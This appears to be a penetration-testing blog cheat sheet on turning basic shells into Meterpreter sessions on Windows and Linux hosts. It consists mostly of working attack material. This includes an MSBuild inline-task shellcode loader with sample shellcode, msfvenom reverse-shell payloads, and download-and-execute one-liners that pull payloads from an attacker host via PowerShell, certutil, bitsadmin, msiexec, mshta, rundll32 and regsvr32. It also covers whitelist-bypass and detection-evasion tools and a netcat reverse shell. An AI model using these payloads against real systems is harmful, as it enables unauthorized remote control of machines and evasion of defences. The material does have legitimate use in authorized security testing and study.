Shell Upgrade Cheat Sheet

7 minute read

Cheatsheet for upgrading regular shells to meterpreter sessions. Covering both Windows and Linux target hosts. handler.sh is mentioned throughout this post, it can be found on my github.

Windows

MSBuild.exe


The Microsoft Build Engine is a platform for building applications. Visual Studio uses MSBuild, but it doesn’t depend on Visual Studio. By invoking msbuild.exe on your project or solution file, you can orchestrate and build products in environments where Visual Studio isn’t installed. The project files in Visual Studio (.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code that executes when you build a project

Generate csharp meterpreter reverse shell code:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f csharp -e x86/shikata_ga_nai -i <# of iterations> 

I’ve added the following symbols /* */ around where we place our generated csharp meterpreter reverse shell code, be sure to change the new byte[] value to the msfvenem one:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {         
          private static UInt32 MEM_COMMIT = 0x1000;          
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(            
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId           
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(           
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );          
          public override bool Execute()
          {
              byte[] shellcode = new byte[195] {
            /*0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
              0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
              0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
              0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
              0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
              0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
              0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
              0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
              0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
              0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
              0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
              0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
              0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };*/
              
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          } 
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Serve the file, download, and execute to get a meterpreter session:

# ./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>                   // start msfconsole handler

# python -m SimpleHTTPServer 80                                                  // serve upgrade.csproj

# Invoke-WebRequest "http://<lhost>/upgrade.csproj" -OutFile "upgrade.csproj"    // download upgrade.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe upgrade.csproj       // execute 

This is the manual approach, the next section demonstrates a tool that takes care of this for us.


nps_payload


nps_payload generates payloads for basic intrusion detection avoidance, however we can also use it to upgrade our shell to a meterpreter session.

nps_payload has two available payloads. The first one is similar to the MSBuild.exe approach in the previous section and generates an xml file that once uploaded and executed on the Windows host sends you a meterpreter shell.

# python nps_payload.py 

...

	(1)	Generate msbuild/nps/msf payload
	(2)	Generate msbuild/nps/msf HTA payload
	(99)	Quit

Select a task: 1

Payload Selection:

	(1)	windows/meterpreter/reverse_tcp
	(2)	windows/meterpreter/reverse_http
	(3)	windows/meterpreter/reverse_https
	(4)	Custom PS1 Payload

Select payload: 1
Enter Your Local IP Address (None): <lhost>
Enter the listener port (443): 443
[*] Generating PSH Payload...
[*] Generating MSF Resource Script...
[+] Metasploit resource script written to msbuild_nps.rc
[+] Payload written to msbuild_nps.xml

1. Run "msfconsole -r msbuild_nps.rc" to start listener.
2. Choose a Deployment Option (a or b): - See README.md for more information.
  a. Local File Deployment:
    - %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
  b. Remote File Deployment:
    - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
3. Hack the Planet!!

Now do the following and you’ll receive a meterpreter shell:

# msfconsole -r msbuild_nps.rc     // start msfconsole handler
# python -m SimpleHTTPServer 80    // serve msbuild_nps.xml

> Invoke-WebRequest "http://<attackingIP>/msbuild_nps.xml" -OutFile "C:\programdata\msbuild_nps.xml"  // download to Windows host 
> C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\programdata\msbuild_nps.xml            // execute 



unicorn


Unicorn uses a PowerShell downgrade attack to inject shellcode straight into memory

# python unicorn.py windows/meterpreter/reverse_tcp <lhost> <port>
→ this will output two files when it's done
1. unicorn.rc 
2. powershell_attack.txt  

# msfconsole -r unicorn.rc               // start msfconsole handler

→ Then copy/paste contents of powershell_attack.txt into Windows shell 
→ If the target host is vulnerable, we should receive a meterpreter session

Another way to achieve this is shown below:

# msfconsole -r unicorn.rc                 // start msfconsole handler

# cat powershell_attack.txt |xclip         // copy contents to clipboard

# vim exploit.html                         // paste powershell_attack.txt content inside

→ Delete everything outside the first " and last "

# python -m SimpleHTTPServer 80            // serve exploit.html

> powershell "IEX (New-Object Net.WebClient).downloadString('http://<lhost>/exploit.html')"  // execute on host

→ Should receive meterpreter session once exploit.html is downloaded and executed 

For more information on the PowerShell downgrade attack, click here.



GreatSCT


GreatSCT is an application whitelist bypass tool, however we can also use it to upgrade our shell to a meterpreter session.

# ./GreatSCT.py --ip <lhost> --port <lport> -t Bypass -p mshta/shellcode_inject/base64_migrate.py --msfvenom windows/meterpreter/reverse_tcp -o upgrade 
...
[*] Language: mshta
[*] Payload Module: mshta/shellcode_inject/base64_migrate
[*] Executable written to: /usr/share/greatsct-output/compiled/upgrade.hta
[*] Execute with: mshta.exe upgrade.hta
[*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/upgrade.rc

# cd /usr/share/greatsct-output/source
# python -m SimpleHTTPServer 80         //serve upgrade.hta

# msfconsole -r /usr/share/greatsct-output/handlers/upgrade.rc   // start msfconsole handler

> mshta.exe //<lhost>/upgrade.hta      // execute on host 

The process shown above is almost identical for the payloads listed below:

[*] Available Payloads:

	1)	installutil/meterpreter/rev_http.py
	2)	installutil/meterpreter/rev_https.py
	3)	installutil/meterpreter/rev_tcp.py
	4)	installutil/powershell/script.py
	5)	installutil/shellcode_inject/base64.py
	6)	installutil/shellcode_inject/virtual.py

	7)	msbuild/meterpreter/rev_http.py
	8)	msbuild/meterpreter/rev_https.py
	9)	msbuild/meterpreter/rev_tcp.py
	10)	msbuild/powershell/script.py
	11)	msbuild/shellcode_inject/base64.py
	12)	msbuild/shellcode_inject/virtual.py

	13)	mshta/shellcode_inject/base64_migrate.py

	14)	regasm/meterpreter/rev_http.py
	15)	regasm/meterpreter/rev_https.py
	16)	regasm/meterpreter/rev_tcp.py
	17)	regasm/powershell/script.py
	18)	regasm/shellcode_inject/base64.py
	19)	regasm/shellcode_inject/virtual.py

	20)	regsvcs/meterpreter/rev_http.py
	21)	regsvcs/meterpreter/rev_https.py
	22)	regsvcs/meterpreter/rev_tcp.py
	23)	regsvcs/powershell/script.py
	24)	regsvcs/shellcode_inject/base64.py
	25)	regsvcs/shellcode_inject/virtual.py

	26)	regsvr32/shellcode_inject/base64_migrate.py

If you run ./GreatSCT.py on its own, it’ll give you a greater understanding of each payload’s setup and what it has to offer.



mshta.exe


Mshta.exe component provides the Microsoft HTML Application Host, which allows execution of .HTA (HTML Application) files.

msf5 > use exploit/windows/misc/hta_server

> set srvhost <lhost>
> set lhost <lhost>
> set lport <lport>

> set payload windows/meterpreter/reverse_tcp

> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on <lhost>:<lport> 
[*] Using URL: http://<lhost>:8080/1KxF2EDVH.hta
[*] Server started.

mshta.exe http://<lhost>:8080/1KxF2EDVH.hta   // execute on host



rundll32.exe


Rundll32 loads and runs 32-bit dynamic-link libraries (DLLs).

msf5 > use exploit/windows/smb/smb_delivery

> set srvhost <lhost>
> set lhost <lhost>
> set lport <lport>

> set payload windows/meterpreter/reverse_tcp

> run 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on <lhost>:<port> 
[*] Started service listener on <lhost>:445 
[*] Server started.
[*] Run the following command on the target machine:   

rundll32.exe \\<lhost>\rwga\test.dll,0 



regsvr32.exe


Registers .dll files as command components in the registry.

msf5 > use exploit/multi/script/web_delivery

> set srvhost <lhost>
> set lhost <lhost>
> set lport <lport>

> set target 3 
> set payload windows/meterpreter/reverse_tcp

> run 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on <lhost>:<lport>
[*] Using URL: http://<lhost>:8080/CPqHf5QVRYt0M0
[*] Server started.
[*] Run the following command on the target machine:

regsvr32 /s /n /u /i:http://<lhost>:8080/CPqHf5QVRYt0M0.sct scrobj.dll



certutil.exe


Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.

# msfvenom -p windows/meterpreter/reverse_tcp lhost=<> lport=<> -f exe > upgrade.exe

# python -m SimpleHTTPServer 80 

# ./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>

> certutil.exe -urlcache -split -f http://<lhost>/upgrade.exe C:\programdata\upgrade.exe & C:\programdata\upgrade.exe 



bitsadmin.exe


bitsadmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.

# msfvenom -p windows/meterpreter/reverse_tcp lhost=<> lport=<> -f exe > upgrade.exe

# python -m SimpleHTTPServer 80

# ./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>

> bitsadmin /transfer upgrade /download /priority  http://<lhost>/upgrade.exe C:\programdata\upgrade.exe & C:\programdata\upgrade.exe 



msiexec.exe


Provides the means to install, modify, and perform operations on Windows Installer from the command line.

# msfvenom -p windows/meterpreter/reverse_tcp lhost=<> lport=<> -f msi > upgrade.msi

# python -m SimpleHTTPServer 80

# ./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>

> msiexec /q /i http://<lhost>/upgrade.msi



Linux

After we’ve got a reverse shell via a netcat listener, we can upgrade that shell to a meterpreter session by leveraging the Metasploit module post/multi/manage/shell_to_meterpreter. First we set up our msfconsole handler:

./handler.sh linux/x86/shell/reverse_tcp <lhost> <lport>  

Then execute nc <lhost> <lport> -e /bin/sh in the netcat shell.

# nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from <victimIP>.
Ncat: Connection from <victimIP>:49337.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'

www-data@pwnd:/var/www/$ nc <lhost> <lport> -e /bin/sh 

Once we receive the new shell on our handler, press Ctrl z to background it. Then run the following commands to upgrade the session to a meterpreter one:

> use post/multi/manage/shell_to_meterpreter
> set session <session id>
> run

[*] Upgrading session ID: <session id>
...
[*] Post module execution completed
[*] Meterpreter session 1 opened ...

> session -i <session id>

meterpreter>